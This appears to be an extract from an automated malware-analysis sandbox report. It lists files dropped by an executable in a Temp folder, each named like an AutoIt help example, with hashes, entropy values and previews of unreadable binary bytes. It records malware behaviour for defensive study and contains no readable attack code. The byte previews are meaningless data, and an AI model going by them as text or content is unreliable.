                                                                                                                                                                                                                                                Preview:.^.Z..X.w.c.....<...{;...#w 3U.....-G..9..5Q+3B>.DI }...|..G.4#.oZx`.T_.)....^o@....../.....al.....u.a..V....u../..1...W.._{...DFH..w.jr.TSD./.....<5...."_.Az.....D......l..>...E{...+85\.vv{p...[.._..Vj....}..'.Y.|..<Y...@x...|..u..{....n;#...)..ig.ry?v.g(..."e.+.....v_..lnFdI.Uj...~.z....f......5.}1...`R25A2...MK.R..7Jh...rNZ..s.Yf.:.?.N.GLU.a.$..6....2Gg.J`.>.....K......yV4qm.@..,..c..e|...E.0..H..m.{+.h....M!..?./.6N.^'z.Y..I..j..k]+!"x..`.a...7E..........r...d......C......3;x...._......e*F.P....$).l..k..G.Hq...#.....r.../.f.o...uU...?.........A.o|..j.....8u.x..E..@5....u.....&..<3c...'..e..y......`.R....u.?.....`.H..._[..W@.%.8bf.a..b....|P."..V..N.I..\*.8.......b|..h............|G...o.m%.<.H...J..FB....@yMYy..:..'.~.....Bj.6j...!...c...z....)\)....{.......)X....~5s..v....A.h.,.[.:.a/..R...I..Y..a......s._Y...p..N...x.....u...+.........C4*>.7.,B1.8.,...b.~).....|n.....<.B....L..7Wfh."^..u..xs.M..v{8.ol*/...eQ..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayAdd[3].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1618
                                                                                                                                                                                                                                                Entropy (8bit):7.8558606601258285
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:3kVxQnrrF4JoWSG51Cy3oKmkjq1PGt8KbXjwgjmJrc0YXUZtwsTWLu1:UVmnfkF7ocqlmpbXjwu4o0jZtwzL2
                                                                                                                                                                                                                                                MD5:54748003F22FBD0A1B0B0616EF7BF18A
                                                                                                                                                                                                                                                SHA1:E89D9CD0A4355A3986845BDD76F99EF4C72E4A12
                                                                                                                                                                                                                                                SHA-256:0E5D1B1ABBF3EB55742DD912A50B47CF7B335A189600E827D64F3A403A397C5A
                                                                                                                                                                                                                                                SHA-512:C292E36D3B49E5CB988D710B0B09E0E576145571A824244D212D4E3ADF6F3187EEB9325685D312BF4355C13985BC2B0AEE70A83A51DB1BF5C4C771D0B2C9AE0D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...i/.@)a1).N..)Y..U..r.6_s&V.l2..W..)...Z&j...68....W.}...)N...|*.\....I..b....(..>m.@...c....y...+..~Z[..]....=.s.D.*.. ...y......G-f.G8.4`9=e..T;.'-R...A.."T.t.V+.Su..r.)6..z...C{f.O.gJ..q..-U8..........W_..(R....!.....GE|/........@..>..i....0..o...Oh..`D../.X7h...L..GAL.C.k...........F.z.Z.k...e.n.{..}Yk*E...Zo.u...T...k6z.1YF(.8....3s.P..or."....N...D...^...v....>....|)^..d.dSP...c&Lc..c.B.......*.yI1....X../.9.C..05.w.L..}..'U.P.B..J.4..../.....W.....+j....N..c8...%..{S.....0....!.r..RW...].Q....q.f$r....'.s......u.clL..Lv.D.,.P32S..d}.;m..CGQ.5)V.....g..I.a.........\E.p.l0.b..9.x).;2.............o[..[...yk^,3.:U.9~.n;.....I..<.....e....8%)G Z~.0pk.=.!..X`.Hx..9....;N,q>...u!p.(...wDa9U..@.<t0........A..C{....H..nNINl...Vh...v....h6V.I3E...........!.9......%.^j........Y..[._X../.....e.x...q.(qUUF*....@..Z...5....-...=W..MzO........99.Z.l."j`u.j..uc..;.D.4..-.s..'@.FB...Md.....\1.I...~..5..,.........TN.UN..=..Pa%.u........,<.].61.........

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayBinarySearch.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1050
                                                                                                                                                                                                                                                Entropy (8bit):7.796600532964034
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:+AlzSpTaj2ig7vDZacjmJrc0YXUZtwsTQgap:FlepL7vD0i4o0jZtwiap
                                                                                                                                                                                                                                                MD5:B3550AA9E93AE42DD1CA342C7D883C0B
                                                                                                                                                                                                                                                SHA1:493D91E11F7DF2F6E7B580742D218BB740F6868C
                                                                                                                                                                                                                                                SHA-256:3341C8EBB94FD7E5616B2A967EB482CEA55519E34DFE1CB26BBEE4AB50F3D3AD
                                                                                                                                                                                                                                                SHA-512:8273AB1204A3B78D533808DA33FEE840F7689FB3D00C394F7C12F92CF27E08AEA468A6C8AA91D04941A017A459730DCF84C751B02A5F46394A355F8F850FBFEA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...7.!.M.D..."'.R.(<.:..G..ya..y......fW.{.$*....L...;.YEv.9!...?.....+.k.....B..a.../emE.m.8..vz..=.VlO2...l.....fm.Z....l.@I....U;..7..|.Nlvr.<.c......Wp#.C.D.c....0.Q...i/......U...`....:K....Y.4..g.G[V...3yz..".2B....B.h.....k..6....7...5../..L...S@.........m.,....V..&.....I.....0*b..7....f..{.,..S.4.5.o....D..W.0....-w..G.s"....Ri.)mI..AU..@B.D...L|.K....C.t.|.{...1..=..........NiHm....r.]..! Qf$.N..b.X.K..\-..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...S.....P.E0.4

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayBinarySearch[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1232
                                                                                                                                                                                                                                                Entropy (8bit):7.81538598360145
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Amgf6zG2G113Rnhherf5hAqMixjmJrc0YXUZtwsTc:Zk1F5Xerf5hEiB4o0jZtwX
                                                                                                                                                                                                                                                MD5:B324FFC54614F2E8DE8AE71E2432C502
                                                                                                                                                                                                                                                SHA1:D1A000BD117B95B09B7024CC0AE165FF23FCFF9A
                                                                                                                                                                                                                                                SHA-256:73FCFD4AE5FF72B2AA4C9A8278067BE55EA243C0C5A294CDEB2A44447430968F
                                                                                                                                                                                                                                                SHA-512:E9CBC883E64F8C5BAD72AC2E1A89F6C77BAF4F006AEFDFB3C847123ADFBA303D799EE58E28A4B48CE3FC5235EF20213F101B14FD7B9EA17D7EEB9E30171A0589
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...DU..........'....NVH..N..K.>.........).c9*\....RD.)#......i..H.... l..r.4.....Do...X~.P..DN?T.M^P.....Xw.....!...f|.c].f6_hr....uO9A...(.@.._Xz.j..ZV........le.<...c*I.7I....s...<w.qW{'.oP.8.z..=Z........|/.jw.t..K.u-..!....XET.$..>hU4y.P......R..j.?..f...f...M...!N}$.....Y../.7...A.....0v.Cb......Nv...k.o.r.D...%.b..b...DZ.e5.z.c8&.K.D.J..a.....fNp.....9..LY.QHh#.[5v...|k.<.c.9.n.......7..r.q.u!...s.....&....'.`..'.....].UxU...e.L...b.g*7.)..}'b...f....P....F.4...CQFZ4..!.)X..T.......E:-2..r.,...NJ.X....R4..p..p..F?..G.0..2.}..D..w.....|..*w..$.F..3..8.Zoj.39.(%)m^W.Z...7...M..;_.Z.\.".c..l*(;..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayColDelete.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:DOS executable (COM)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1133
                                                                                                                                                                                                                                                Entropy (8bit):7.810388439021658
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:6lgyUuDAdvQ0f9dX+ffyh/1E2jmJrc0YXUZtwsTk:6lowAdPFdyKN4o0jZtw3
                                                                                                                                                                                                                                                MD5:AD043EDF1874EFA3060BE6495ECBB7FD
                                                                                                                                                                                                                                                SHA1:F5E575E7E9EE1AC61950E59633F2463EEFB627A6
                                                                                                                                                                                                                                                SHA-256:917C6906962EB5EEA38516AA1F3FE089BA8CE7C637045DD4588AFAAC600CDF42
                                                                                                                                                                                                                                                SHA-512:4CE2B1281BDFCF1CF3F4075903CC4FAECF6CC9CD3E8EC8414771C611DF2A3F619AC56503C814E831B153C82DDDA1BD3A4AA89FF5D59B740E21AB10B206DACD86
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.$..".g....A.........\.q^..T..[X0._...nG".a...@V.i.T.n.r,.XKi....q...'n.u..g7.F.T..!.*MoB.D.vyJya..X[4d........".N.K.....1r_.% o..[U..$.<.....$H..?`....;9...#,.........)....z.gNN.j.....|..Y!..A.&^N.....V....-U.d.Xp...1..\f...M....Y.8.f..F,#8/.8.......t'_.h.Vn?..../(9..Pqk6.....M ..y.N..^.-GH...5.i&j.<..Y-'.e0OT.].X..38...ua.X/....m.......-....u..F...C X.|O.'..l....aU.._..................CvT...<...._A.M.DM>..|.......:.V.../.a.N)..3@...S<.....R.=+.GO.$.G.w<.........m......s.'...*_....t@.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayColInsert.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):938
                                                                                                                                                                                                                                                Entropy (8bit):7.742590329492485
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:CA398s5IZGUOYIWLNCJs0gYjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsw:Cy9BeIWLQJ1jmJrc0YXUZtwsTIQIy
                                                                                                                                                                                                                                                MD5:EFA1F64DA28F9379554F76AB27D754AC
                                                                                                                                                                                                                                                SHA1:D02EB6AE06079999369279095FBF583233CDA72D
                                                                                                                                                                                                                                                SHA-256:AFCDE4D973E314213A820779C395265676959F0BF29867719401660E2C85699E
                                                                                                                                                                                                                                                SHA-512:086D4E1428190D1D76C3CCE8628E749A504B8EB4149ABCFF365EFD740BBB09100BB74F5040524AD044C03BB2FC213226861092C159EA0757131D1BD890BF2574
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:<.g. e...PhR.d.....g."[...?..*..(...G.dD]......k.)-c.....F$.\.D..E....4..{.)..2A(..k.V.K..;@c.h..i..".m.g.J....}...?cf%.-4./......M..[.},,.......iIW...5.....J5...#v.dc..O..{.5.8..u.Cj..r.O.[.k..(q..CG7`DO......U.U?.!...<.iD..A.../*k...(..(].e..F.#.R.<ZEL...L..Z..[.D..!x.i..%......!.....k...W)....q......G,:.h.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...i.S4.{;.B.....*W4* ....p.zJ......hJ...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayCombinations.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):903
                                                                                                                                                                                                                                                Entropy (8bit):7.749554775563219
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1j4PvLb/7wUVnToM6mA8LjmJrc0YXUZtwsTr:1jcLb/7htZ6mA8P4o0jZtwk
                                                                                                                                                                                                                                                MD5:339567A40955949F537B210AEA163C22
                                                                                                                                                                                                                                                SHA1:C702F7BB1CB8B25767970B2808C53CCAA613A336
                                                                                                                                                                                                                                                SHA-256:E0839779636855C1C9F744315A345602D4C417B62F510129755FC8285A65AC5D
                                                                                                                                                                                                                                                SHA-512:30D42B8991C9C554CC99D1B14B7D86E8DC2565068970E86C127D452E3A23E78C86A4D70F42B78ABBE3ED8AB1FC889953504F4DDC1A412504CF59B2338CC3686F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.nh.q...T.:.......Q..v......Yq..b..eY.......e.....H..J&Q:........8.l.S..P.P.]..O.b.J.te1. .;/.....(.I_.|jU.q..".z....R..?.Ca.Y$....y.C...t.....)u.A..z.7p.+r..lj...."D.7/.JZQ..sB.y'......V.....U..A..Ba..q.i.y..1.`^p7....4......C..YI-.c....$....uQ...R..Fa...9u...1.sz.y.\...;...R2^l..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.Y.Y..z.......D.9...Mc..w.S..o=].4.'...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayConcatenate.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1374
                                                                                                                                                                                                                                                Entropy (8bit):7.860009177497254
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:UwtqxKkrB82Q2t5YlICYdHD7pTHDK/jmJrc0YXUZtwsTph:7bMq2tKJejl3Kb4o0jZtwQ
                                                                                                                                                                                                                                                MD5:1C54E2E03DC9F8ED2573F0ECEDD3F089
                                                                                                                                                                                                                                                SHA1:18581905588FFAD127B1D4CE8C5E2EA8E3CF8DDF
                                                                                                                                                                                                                                                SHA-256:31E58F40C3E9CDBCC9051B04EC254C1940329F9BD7CFA45540CF7E14C9CD97AD
                                                                                                                                                                                                                                                SHA-512:0566D215DD488846A370AE4C9E59E04E59BBA7DD7125C548D79152DE2846F91D9AC425F11CFC37D076936778113CC93739655CEA7FC8BA77E67BFA516B10E6A7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.&!..xi....P..I..$.....D9N.F...}fM..[.....~..........._8..?Bx..=:.+.hi.\i.G..O..+b..*..;:f[..^8......Sg..cXO.yE....o....X:Niz.3..x....L..A..$..0..).....6..D..Q.&..m\..3....WIW".F...k!Z.?. h(_l....Gx..c.c>...c...jy.Uc4.Z..z.P..0o.......q......pB.A.4.T..l|....{.!.i$.x..}...B..jJ......a..-J.....;..=....tK...bI.....^.3........]......J|....O....2.A.&.sc.R4T.9%...6.<E....`!4.0.77.Rj...Ku.F.......~.iM....h..p.~.....s..+J.@B..?..x......T.w7<'..$.1.`..)....c.(Q........q...-.T...x..n...V.V...v.~....{+...0.'....6.w....o....M._..+.y....i..h...A....W.DZ...M.0.t...7.@.}.p.U..I.*...{.~.o.BF.fv....>W......>..T7..R.f..8.M.S.xF.<E..W,...t...&.#..*\..U.P..?.wF..A.<w...T..a.u.f.Ia......{.3?A.i@..i<.....iY7kn.Q..:g..e.,...<.S09C^w8v.N.RU=9Yw/<e.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayDelete.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1472
                                                                                                                                                                                                                                                Entropy (8bit):7.884945481536755
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:02xed/kopQWc1dmkGnM8IYYy8pLldwVa+bmFNWtfKjmJrc0YXUZtwsTAL:0VdRpQW2GMJjpxdwk2mFsfU4o0jZtwpL
                                                                                                                                                                                                                                                MD5:922443342680838E061C42CBE447A056
                                                                                                                                                                                                                                                SHA1:53EB56921E01DFE13C908620209ADF8268D1BCE7
                                                                                                                                                                                                                                                SHA-256:0700584021274C3E0F2D427C5E0FE71BC275815B98B67C0CB80BAF9FF537E2AD
                                                                                                                                                                                                                                                SHA-512:DF52EB0F841C3185D6DC675B988EAC4BBEEBDD1B27328CE71426B36E4074F365654FA2405F98B65BF17B9BFCA7F3D795D698CD753A7AF6E1002DC0212E866CD7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:C.<..(....."O..h.f9.@.f0.!R..$K.d.....[.^...!...T.....57../k.^..l.MT.(..b7v...<..-2:~...gN!+FP.Y.......bo..C......a.h....+IL>.<;.*.%.G.......*1.lv..eQRFp...XO./.W.K/.*5...@...y.#.((\.../.g...ngu.&!.../*.@..d.._..?.....S4..1s.....B.D !.....#..p.tL~9"2...m. L...X.1.3.9.....x...5.>OX.6#.?,S..... ......+z.+...4...>.~v>...i......l....u..QYd...j.[..A}.EOH....Ii.*.H.}.....J..2.').h.......y?'..h..@I.."..B.X...R`.....R2]..\.|.j.........0i.]....G.a.14..>r..5..v&8(u>.X.rK`.EJ1.......7$qY.v....Y...]..V......H0@'2.h..0x.G4eB"..{.&.h...m...cfC...PE_..2^]..g.F...M.0.....]..... GL.".....9h.N....2........y]/....4,..*.J. ....s..M8..P(S.k.jH........@........%..j3..d%..1.8P..r.....=F...e..........t...K...h.dI..-..=...<m....J.....S.ILk%.2..{.U.qBr.h&.T.:.8d&.2.6.@...._... ..2..w...n{....g?.h..v5".v.r.f.4...5}....7.....C...Z....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayDisplay.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2327
                                                                                                                                                                                                                                                Entropy (8bit):7.915400737640085
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:J3ySuvdOlorYTnKxnj294EGEnkR+2jdyc9tP6kSu4o0jZtwP:lySuTEnI2JGsk824c/NSDleP
                                                                                                                                                                                                                                                MD5:28D6BFF0A5940EDE58076D555AECFE12
                                                                                                                                                                                                                                                SHA1:66BB5C2AFE5A85F57EE1C2DEF21BD16D72CCA115
                                                                                                                                                                                                                                                SHA-256:B71980322C785FA642F1519A13FD90C8D7817116C59688A8B69925F31C34E52D
                                                                                                                                                                                                                                                SHA-512:2B6F849ACEA2BBE8D9F2881FC0AAB6A486D0ADF3275B78C68289DD95C6E959F940D6CBC9AF05A1F0FBCC9DA0F94CFA82F7114EECB162D2EC04ED246D2BEA9FF0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:~...#.bf......bR...a9.@1.?3.a....e.ht....A.y3.#.X$)O.6.k.r..G...?..0GS...3....fs`.....(.L*.0Qo;$.i...b.m..@.i..X.3...........s.>.p.$..3..-c/Q.".J./{?..k.-.*LY...h...;9>".y.nC..hl.t2.].<.Bcj.#.1.........}..O..Y...F.v.|v..q. E*I.cR..5..T.X...h.....m3.{..3.....83...G......D.N..Ir..:Q.........k..;....3...}3.6.^..g....R,...+.wC..u.....Vkd....J..t."..k..q.IG.......D.AjS.i#.aTJ1.D.-.c:.c...1{v..Wt.y....ZMW8..j...-m....+.....om.}3....AiP...cmM...L...........?.t6.Y=..^fF.......2......?.>k....V.N........'D).......;p....9&..'.......?.7DhLu.I..KjK..|yn.l.....g..~.].Xt9c....?...!......w../U.....v...G.>}j/....1..Zy$Q..N)....f.'Sq.f.P.g....Y.....3.HF:v|..I.7i...:.j-....}.W..}n.d.W.H..giQ.....a-.....Q.1T.."A....A.....6.@$y.`.'^v.*AU.W.p....#..../.2..X...8 ..z..&.).V...Q..............?...&2cU....n.rxc.....a.*.2.2.5..9........9.AV.&..g".G....B..s..G]....A..|"<..[...4.%Z.A....f8.[z/..F.1......9......Bf8..\.G3_..H:.....[>.......A.q..0.r.K...M,.....J

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayExtract.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):866
                                                                                                                                                                                                                                                Entropy (8bit):7.75008154434933
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:X5vtdHQeJRoT9afwlY0HKjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1d:JjQekT9afyYuKjmJrc0YXUZtwsTmy
                                                                                                                                                                                                                                                MD5:DED02001F9E33B8DC6C81F22E09DC0C4
                                                                                                                                                                                                                                                SHA1:82F878A9DAF58C105AFC665F3F55AA0A6B4258DC
                                                                                                                                                                                                                                                SHA-256:13C1DFA78C65147E901172477034763234A2CA111B23BF88F3F367EC7BAC220D
                                                                                                                                                                                                                                                SHA-512:1F3D3F4C0DC6EF622D4B1DD96F3DE736E7B9A7A872CB79E21011D7447D983F37CE55EEACB27BBB67864D9F3ECA450468856355931C5F2BA4EEADF65759DCD655
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.17r.K.s+.>../..u..\4.....(........g*.w*%?8e..B....Dx.2.z....X.>H..G..#....B^..e..?.....)...w.zp ..ud...W.;.....67.d....$.u/..E9QY..6'Ks@.O.H..o...3.w....s..`/.>.(Pm....'U..#6.#..e...r.......v........G^....+.m.o C,P...cNm.AO..#z..&.".G.B._-...N.T!.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..6.L`..l.E._j..kwn..4?"h]Tls8Ll..b....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayFindAll.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1210
                                                                                                                                                                                                                                                Entropy (8bit):7.799427418360245
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:XUb1OeKCBh7FDDjoPaVV7NV0pjmJrc0YXUZtwsTn:XWuChE6054o0jZtws
                                                                                                                                                                                                                                                MD5:06BFFBD76FE3B5060C51BB4841F618A4
                                                                                                                                                                                                                                                SHA1:43AB88CEF91B45998B56A9B1D1E086E43DD2AFC5
                                                                                                                                                                                                                                                SHA-256:ED168BDD59C87DA63AAF1FCFB63C3E99C83CE47FE9E9C43086502ACAC77389FA
                                                                                                                                                                                                                                                SHA-512:0951BB35F712D61EDBBD08563D4D2B37287B1B906A16CA6B44F6EAE992832406EBE36339EA9F293A7ED03359A0CCE2B5158A559FDAFF2AD0E9414A25B3668D92
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..s0.;./p....BM..F.z..~.Tu..4.,0o...\4;q[...o...7..O.u.L.....L.p.$@U.`../>......vK..Pju.]..T..=.Ux'~.N..o.W.U.Y..]............H.]...Z.#\13#j.@...U.H?6...8.yf.e.....Z..).l?F....)...t.8D.e-&....}..A...L.Y.....0.d>-.... 4TN.~:3..}E.cn.D.j..6..k.H..~Gp*..O:......)}..P....w..9.1i.../........;.v.3..Z.%......4:iJ.Bq...<.1v...[.w=t.q.....c.F..^.b..#..=......l.......".N..9K.S.>...Q..[.E..0G..H.Oi.VOHvF...rw?.f...T....S......5..\.Y...2..........C.s.NV..V)Q...)......E5P...Jc.0UP.8..Am.J..)....l/........(.I..?@...j%.X.Tp%....*#..1.8~<.....I....&.f..S/.z....X.Dv.O.[K.h".&..{.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayFromString.au3

                                                                                                                                                                                                                                                Download File
